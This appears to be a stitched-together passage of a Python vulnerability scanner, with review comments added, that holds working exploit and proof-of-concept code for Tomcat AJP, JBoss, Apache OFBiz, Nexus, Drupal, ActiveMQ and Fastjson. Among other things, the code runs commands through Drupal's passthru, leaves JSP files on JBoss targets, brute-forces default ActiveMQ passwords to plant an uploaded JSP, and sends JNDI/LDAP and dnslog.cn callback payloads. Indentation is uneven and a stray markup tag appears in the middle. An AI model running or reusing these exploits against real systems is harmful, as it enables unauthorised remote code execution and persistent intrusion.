     self.username = None
     self.password = None
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.request = "null"
     raw_data = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
                ">_< So there is no HTTP protocol request and response"
     try:
         # NOTE(review): process-wide default, affects every socket in
         # the interpreter from here on.
         socket.setdefaulttimeout(self.timeout)
         # NOTE(review): no close() anywhere, so the socket (and the
         # makefile stream) leak on success, on early return and on error.
         self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         self.socket.connect((self.hostname, self.default_port))
         self.stream = self.socket.makefile("rb",
                                            buffering=0)  # PY2: bufsize=0
         self.attributes = [
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.request_uri', '/']
             },
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.path_info', file]
             },
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.servlet_path', '/']
             },
         ]
         method = 'GET'
         self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
             self,
             self.hostname,
             self.default_requri,
             method=AjpForwardRequest.REQUEST_METHODS.get(method))
         # Dead under the assignments above (both are None). If it were
         # reached, str.encode('base64') is Python 2 only and the
         # adjacent-literal "\n" "" collapses to a one-argument replace().
         if self.username is not None and self.password is not None:
             self.forward_request.request_headers[
                 'SC_REQ_AUTHORIZATION'] = "Basic " + str(
                     ("%s:%s" % (self.username, self.password)
                      ).encode('base64').replace("\n"
                                                 ""))
         # self.default_headers is {} here, so this loop is a no-op.
         for h in self.default_headers:
             self.forward_request.request_headers[h] = headers[h]
         for a in self.attributes:
             self.forward_request.attributes.append(a)
         self.responses = self.forward_request.send_and_receive(
             self.socket, self.stream)
         if len(self.responses) == 0:
             # NOTE(review): inconsistent return shape (tuple vs None).
             return None, None
         self.snd_hdrs_res = self.responses[0]
         # First frame is the send-headers response, last is end-response;
         # the data frames in between form the body.
         self.data_res = self.responses[1:-1]
         # decode() without an error handler: a non-UTF-8 body raises and
         # lands in the generic except below.
         self.request = (b"".join([d.data for d in self.data_res]).decode())
         verify.exploit_print(self.request, raw_data)
     except socket.timeout:
         verify.timeout_print(vul_name)
     except Exception as error:
         verify.error_print(vul_name)
    def cve_2010_1428_poc(self) -> None:
        """Probe JBoss for CVE-2010-1428 (web-console Invoker bypass).

        Sequence as written: HEAD ``/web-console/Invoker`` with
        ``self.payload_cve_2010_1428`` as the body, pause 0.5 s, GET
        ``/jexws4/jexws4.jsp?ppp=echo <md>``, then repeat both without the
        pause; "PoCSuCCeSS" when ``md`` survives ``misinformation()`` on
        the last GET. Reported via ``verify.scan_print`` with
        ``self.threadLock`` held throughout.

        Side effect on the target: whatever the payload deploys under
        ``/jexws4/`` is left in place; this method removes nothing. The
        HEAD-with-body to ``/web-console/Invoker`` is the request shape
        a defender can key on.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-1428"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "JBoss WEB 控制台安全验证绕过漏洞"
        self.vul_info["vul_numb"] = "CVE-2010-1428"
        self.vul_info["vul_apps"] = "JBoss"
        self.vul_info["vul_date"] = "2010-04-19"
        self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件上传"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "JBoss企业应用平台中存在多个非授权访问漏洞,远程用户可以绕过认证执行非授权操作或读取敏感信息。"
        self.vul_info["cre_date"] = "2021-01-28"
        self.vul_info["cre_auth"] = "zhzyker"
        self.path = "/web-console/Invoker"
        md = random_md5()
        cmd = "echo " + md
        #  self.data = ":-)"
        # NOTE(review): `bad` is assigned but never read.
        bad = "20" + md
        try:

            # HEAD request carrying a body; payload contents are not
            # visible in this method.
            self.req = requests.head(self.url + self.path,
                                     data=self.payload_cve_2010_1428,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            time.sleep(0.5)
            self.cmd = urlencode({"ppp": cmd})
            self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" +
                                        self.cmd,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)
            # Second round, identical apart from the missing sleep; only
            # the final GET is evaluated below.
            self.req = requests.head(self.url + self.path,
                                     data=self.payload_cve_2010_1428,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            self.cmd = urlencode({"ppp": cmd})
            self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" +
                                        self.cmd,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)
            # misinformation() is a project helper defined elsewhere.
            if md in misinformation(self.request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = self.url + self.path
                # NOTE(review): the report string hard-codes "ppp=whoami"
                # although the probe itself only sent "echo <md>".
                self.vul_info[
                    "prt_info"] = "[web-console] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as e:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()
    def cve_2021_26295_poc(self) -> None:
        """Probe Apache OFBiz for CVE-2021-26295 via a DNS callback.

        Sequence as written: obtain a throwaway domain from
        ``www.dnslog.cn``, hex-encode it into
        ``self.payload_cve_2021_26295_poc``, POST that SOAP body to
        ``/webtools/control/SOAPService``, then ask dnslog.cn whether the
        domain was resolved. "PoCSuCCeSS" is set only when the lookup
        shows up. Reported via ``verify.scan_print`` with
        ``self.threadLock`` held throughout.

        Dependencies worth knowing: both dnslog.cn calls send a fixed,
        hard-coded ``PHPSESSID``/``UM_distinctid`` cookie, and the
        ``dns.text`` reply is used verbatim as the domain with no
        validation — an error page from dnslog.cn would be embedded in the
        payload unchanged. The observable signal on the target side is an
        outbound DNS query for a ``dnslog.cn`` subdomain from the OFBiz
        host following a POST to ``SOAPService``.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution"
        self.vul_info["vul_numb"] = "CVE-2021-26295"
        # NOTE(review): "Flink" disagrees with the OFBiz name and CVE
        # above; looks like a copy-paste slip in the report metadata.
        self.vul_info["vul_apps"] = "Flink"
        self.vul_info["vul_date"] = "2021-03-25"
        self.vul_info["vul_vers"] = "< 17.12.06"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Arbitrary Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \
                                    "攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器."
        self.vul_info["cre_date"] = "2021-03-31"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': 'text/xml',
            'Connection': 'close'
        }

        def _trans(s):
            """Return the lowercase hex encoding of the bytes in ``s``."""
            return "%s" % ''.join('%.2x' % x for x in s)

        def dnslog_re(md):
            """Return ``md`` if dnslog.cn lists a lookup for it, else None.

            Polls ``getrecords.php`` once with the same fixed session
            cookie used for the domain request; falls off the end (None)
            when the marker is absent.
            """
            headers_dnslog = {
                'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
                'Host': 'www.dnslog.cn',
                # NOTE(review): fixed third-party session cookie; the
                # record lookup presumably only works while this session
                # is valid on dnslog.cn — TODO confirm.
                'Cookie':
                'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
                'Accept': '*/*',
                'Referer': 'http://www.dnslog.cn/',
                'Accept-Language': 'zh-CN,zh;q=0.9',
                'Connection': 'close'
            }
            dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"
            # Hard-coded 10 s timeout rather than self.timeout.
            dns = requests.get(dnslog_url,
                               headers=headers_dnslog,
                               timeout=10,
                               verify=False)
            if md in dns.text:
                return md

        try:
            headers_dnslog = {
                'User-Agent':
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
                'Host': 'www.dnslog.cn',
                # Same fixed cookie as in dnslog_re(); the two calls must
                # share it for the record lookup to see this domain.
                'Cookie':
                'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
                'Accept': '*/*',
                'Referer': 'http://www.dnslog.cn/',
                'Accept-Language': 'zh-CN,zh;q=0.9',
                'Connection': 'close'
            }
            dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
            dns = requests.post(dnslog_api,
                                headers=headers_dnslog,
                                timeout=10,
                                verify=False)
            # NOTE(review): response body used as the domain with no
            # status or format check.
            dns = dns.text
            dns_data = bytes(dns, encoding="utf8")
            dns_hex = _trans(dns_data)
            data = self.payload_cve_2021_26295_poc.replace(
                "RECOMMAND", dns_hex)
            url = urljoin(self.url, "/webtools/control/SOAPService")
            request = requests.post(url,
                                    data=data,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
            # Single poll, immediately after the POST; no retry or delay.
            if dnslog_re(dns):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()
 def cve_2015_7501_poc(self) -> None:
     """Probe JBoss for CVE-2015-7501 (JMXInvokerServlet deserialization).

     Sequence as written: POST ``self.payload_cve_2015_7501`` to
     ``/invoker/JMXInvokerServlet``, pause 0.5 s, GET
     ``/jexinv4/jexinv4.jsp?ppp=echo <md>``, then repeat both without the
     pause; "PoCSuCCeSS" when ``md`` is in the last GET's body and
     survives ``misinformation()``. Reported via ``verify.scan_print``
     with ``self.threadLock`` held throughout.

     Side effect on the target: whatever the payload deploys under
     ``/jexinv4/`` is left in place. The serialized POST to
     ``/invoker/JMXInvokerServlet`` is the request a defender can key on.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "RedHat JBoss: CVE-2015-7501"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "JBoss 反序列化远程命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2015-7501"
     self.vul_info["vul_apps"] = "JBoss"
     self.vul_info["vul_date"] = "2015-11-15"
     self.vul_info["vul_vers"] = "5.x, 6.x"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程命令执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "此漏洞主要是由于JBoss中invoker/JMXInvokerServlet路径对外开放,由于JBoss的jmx组件支" \
                                 "持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制," \
                                 "导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时," \
                                 "导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞"
     self.vul_info["cre_date"] = "2021-01-28"
     self.vul_info["cre_auth"] = "zhzyker"
     self.path = "/invoker/JMXInvokerServlet"
     # NOTE(review): self.data and `bad` are assigned but never read here.
     self.data = ":-)"
     md = random_md5()
     cmd = "echo " + md
     bad = "20" + md
     try:
         self.request = requests.post(self.url + self.path,
                                      data=self.payload_cve_2015_7501,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         time.sleep(0.5)
         self.cmd = urlencode({"ppp": cmd})
         self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
                                     self.cmd,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         # Second round; self.req keeps this POST for the report dump.
         self.req = requests.post(self.url + self.path,
                                  data=self.payload_cve_2015_7501,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         self.cmd = urlencode({"ppp": cmd})
         self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
                                     self.cmd,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         # Outer test is a cheap pre-filter; misinformation() (project
         # helper defined elsewhere) does the final decision.
         if md in self.request.text:
             if md in misinformation(self.request.text, md):
                 self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = self.url + self.path
                 # NOTE(review): the report names /jexws4/jexws4.jsp, but
                 # this probe requested /jexinv4/jexinv4.jsp above.
                 self.vul_info[
                     "prt_info"] = "[JMXInvokerServlet] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2020_10199_poc(self) -> None:
     """Check a Nexus Repository Manager 3 target for CVE-2020-10199 and print the result.

     Fills ``self.vul_info`` with the finding's metadata, logs in with the
     hard-coded default credentials ``admin:admin``, then submits
     ``self.payload_cve_2020_10199`` to the Go repository-group endpoint and
     treats the random marker echoing back in the response body as a
     positive result. Output goes through ``verify.scan_print`` or one of the
     ``verify.*_print`` error helpers; nothing is returned.

     ``self.threadLock`` is held for the whole run and released at the end.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2020-10199"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2020-10199"
     self.vul_info["vul_apps"] = "Nexus"
     # NOTE(review): "20120-04-01" looks like a typo for 2020-04-01; the value
     # is only ever printed, so it is left as-is here.
     self.vul_info["vul_date"] = "20120-04-01"
     self.vul_info["vul_vers"] = "3.x <= 3.21.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当," \
                                 "导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码,获取系统权限。 "
     self.vul_info["cre_date"] = "2021-01-27"
     self.vul_info["cre_auth"] = "zhzyker"
     self.session_headers = {
         'Connection': 'keep-alive',
         'X-Requested-With': 'XMLHttpRequest',
         'X-Nexus-UI': 'true',
         'User-Agent': self.ua
     }
     # Random marker: the check is positive only when this value shows up in
     # the body of the second response.
     md = random_md5()
     cmd = "echo " + md
     try:
         # Hard-coded default credentials, base64-encoded for the session
         # endpoint. The check can therefore only succeed on an instance that
         # still uses admin:admin (recorded in prt_info on success).
         self.us = base64.b64encode(str.encode("admin"))
         self.pa = base64.b64encode(str.encode("admin"))
         self.base64user = self.us.decode('ascii')
         self.base64pass = self.pa.decode('ascii')
         self.session_data = {
             'username': self.base64user,
             'password': self.base64pass
         }
         # NOTE(review): this request uses a fixed 20 s timeout and default
         # certificate verification, unlike the rest of the file
         # (self.timeout, verify=False).
         self.request = requests.post(self.url + "/service/rapture/session",
                                      data=self.session_data,
                                      headers=self.session_headers,
                                      timeout=20)
         # Pull the session cookie out of the stringified response headers.
         # If login failed there is no match and .group(1) raises
         # AttributeError, which the generic handler below turns into
         # error_print.
         self.session_str = str(self.request.headers)
         self.session = (re.search(r"NXSESSIONID=(.*); Path",
                                   self.session_str).group(1))
         self.rce_headers = {
             'Connection': "keep-alive",
             'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
             'X-Requested-With': "XMLHttpRequest",
             'X-Nexus-UI': "true",
             'Content-Type': "application/json",
             '404': "" + cmd + "",
             'User-Agent': self.ua,
             'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
                       "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
         }
         # NOTE(review): no timeout on this request, so an unresponsive target
         # can block this thread (and the held lock) indefinitely.
         request = requests.post(self.url +
                                 "/service/rest/beta/repositories/go/group",
                                 data=self.payload_cve_2020_10199,
                                 headers=self.rce_headers)
         if md in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = cmd
             self.vul_info[
                 "prt_info"] = "[rce] [admin:admin] [payload: " + cmd + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def cve_2018_7602_exp(self, cmd: str) -> None:
     """Run the CVE-2018-7602 (Drupal) request sequence and print the final response.

     Uses one ``requests.Session`` for the whole flow: log in with the
     hard-coded ``admin:admin`` credentials, read the user id from the
     profile page, fetch the account-cancel form token, submit the cancel
     form with ``cmd`` carried in the ``destination`` parameter, then post
     the resulting ``form_build_id`` to the file/ajax path. The body of the
     last response is handed to ``verify.exploit_print``; nothing is
     returned. Every parsing step assumes the expected HTML element exists,
     so a missing element raises AttributeError and ends in ``error_print``.

     Args:
         cmd: text appended to the ``destination`` query parameter.
     """
     vul_name = "Drupal: CVE-2018-7602"
     # Hard-coded default credentials; the flow only works where they are valid.
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     try:
         self.session = requests.Session()
         # Step 1: authenticate through the login form.
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         # Step 2: read the logged-in user's id from the foaf:name meta tag.
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         # Non-clean URLs expose the id as "?q=user/N"; keep only the part
         # after "=".
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         # Step 3: fetch the cancel-confirm form to obtain its form_token.
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         # Step 4: submit the cancel form; cmd travels in the destination
         # parameter. The response carries a fresh form_build_id.
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         # Step 5: post the form_build_id to the file/ajax path and print
         # whatever comes back.
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
         verify.exploit_print(self.r.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
<doc_update>
 def cve_2016_3088_poc(self) -> None:
     """Check an Apache ActiveMQ target for CVE-2016-3088 and print the result.

     Fills ``self.vul_info`` with the finding's metadata, tries each
     ``user:pass`` entry in ``self.passlist`` as HTTP Basic auth to read
     ``activemq.home`` from ``systemProperties.jsp``, PUTs a file containing
     a random marker to ``/fileserver/v.txt``, MOVEs it to a random
     ``.jsp`` name under ``webapps/api`` and checks whether the marker is
     served back from ``/api/<name>.jsp``. Output goes through
     ``verify.scan_print`` or one of the ``verify.*_print`` helpers;
     nothing is returned.

     Note that the file written to the target is not removed afterwards;
     its path is recorded in ``prt_info`` on success.

     ``self.threadLock`` is held for the whole run and released at the end.
     """
     self.threadLock.acquire()
     # NOTE(review): "AcitveMQ" is misspelled here and in vul_apps; both are
     # display strings only.
     self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2016-3088"
     self.vul_info["vul_apps"] = "AcitveMQ"
     self.vul_info["vul_date"] = "2016-03-10"
     self.vul_info["vul_vers"] = "< 5.14.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
     self.vul_info["cre_date"] = "2021-01-07"
     self.vul_info["cre_auth"] = "zhzyker"
     # self.rawdata is set but not read anywhere in this method.
     self.rawdata = None
     # activemq.home as reported by the target; stays "null" if no credential
     # yields a readable systemProperties.jsp.
     self.path = "null"
     # Random file name and random body marker for the upload check.
     self.name = random_md5()[:-20]
     self.webshell = "/" + self.name + ".jsp"
     self.poc = random_md5()
     # NOTE(review): self.exp is assigned but never used below; the PUT body
     # is the marker self.poc, not self.jsp_webshell.
     self.exp = self.jsp_webshell
     self.passlist = [
         "admin:123456", "admin:admin", "admin:123123", "admin:activemq",
         "admin:12345678"
     ]
     try:
         try:
             # Credential sweep: the first entry that returns 200 and exposes
             # activemq.home wins. self.pa / self.headers_base64 keep the last
             # entry tried, whether or not it succeeded.
             for self.pa in self.passlist:
                 self.base64_p = base64.b64encode(str.encode(self.pa))
                 self.p = self.base64_p.decode('utf-8')
                 self.headers_base64 = {
                     'User-Agent': self.ua,
                     'Authorization': 'Basic ' + self.p
                 }
                 self.request = requests.get(
                     self.url + "/admin/test/systemProperties.jsp",
                     headers=self.headers_base64,
                     timeout=self.timeout,
                     verify=False)
                 if self.request.status_code == 200:
                     # [0] raises IndexError when the page has no
                     # activemq.home row; that leaves the for loop via the
                     # handler below.
                     self.path = \
                         re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                     break
         except IndexError:
             pass
         # Upload the marker, move it to a .jsp name under webapps/api, then
         # request it back.
         self.request = requests.put(self.url + "/fileserver/v.txt",
                                     headers=self.headers_base64,
                                     data=self.poc,
                                     timeout=self.timeout,
                                     verify=False)
         self.headers_move = {
             'User-Agent':
             self.ua,
             'Destination':
             'file://' + self.path + '/webapps/api' + self.webshell
         }
         self.request = requests.request("MOVE",
                                         self.url + "/fileserver/v.txt",
                                         headers=self.headers_move,
                                         timeout=self.timeout,
                                         verify=False)
         self.request = requests.get(self.url + "/api" + self.webshell,
                                     headers=self.headers_base64,
                                     timeout=self.timeout,
                                     verify=False)
         # Positive only when the moved file is served back with the marker.
         if self.poc in self.request.text:
             self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
             self.vul_info[
                 "prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
 def fastjson_1247_poc(self) -> None:
     """Check a target for the Fastjson <= 1.2.47 deserialization issue and print the result.

     This is an out-of-band check: the JSON body references a per-run
     DNS-log hostname obtained from ``dns_request()``, is POSTed to
     ``self.url``, and the result is decided by ``dns_result(md)`` —
     i.e. whether a lookup for that hostname was observed — not by the
     HTTP response. Output goes through ``verify.scan_print`` or one of the
     ``verify.*_print`` helpers; nothing is returned.

     ``self.threadLock`` is held for the whole run and released at the end.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.47"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "null"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2019-07-15"
     self.vul_info["vul_vers"] = "<= 1.2.47"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。"
     self.vul_info["cre_date"] = "2021-01-20"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         'User-Agent': self.ua,
         'Content-Type': "application/json",
         'Connection': 'close'
     }
     # md is the DNS-log token for this run; dns is just an alias used when
     # building the payload and the printed strings.
     md = dns_request()
     dns = md
     data = {
         "a": {
             "@type": "java.lang.Class",
             "val": "com.sun.rowset.JdbcRowSetImpl"
         },
         "b": {
             "@type": "com.sun.rowset.JdbcRowSetImpl",
             "dataSourceName": "ldap://" + dns + "//Exploit",
             "autoCommit": True
         }
     }
     data = json.dumps(data)
     try:
         try:
             request = requests.post(self.url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
         except:
             # NOTE(review): this bare except also swallows Timeout and
             # ConnectionError, so the outer handlers below never see errors
             # from the POST; the DNS check still runs.
             pass
         # The verdict comes from the DNS log, not from the HTTP response.
         if dns_result(md):
             # NOTE(review): vul_payd ends with a stray "] " (display only).
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()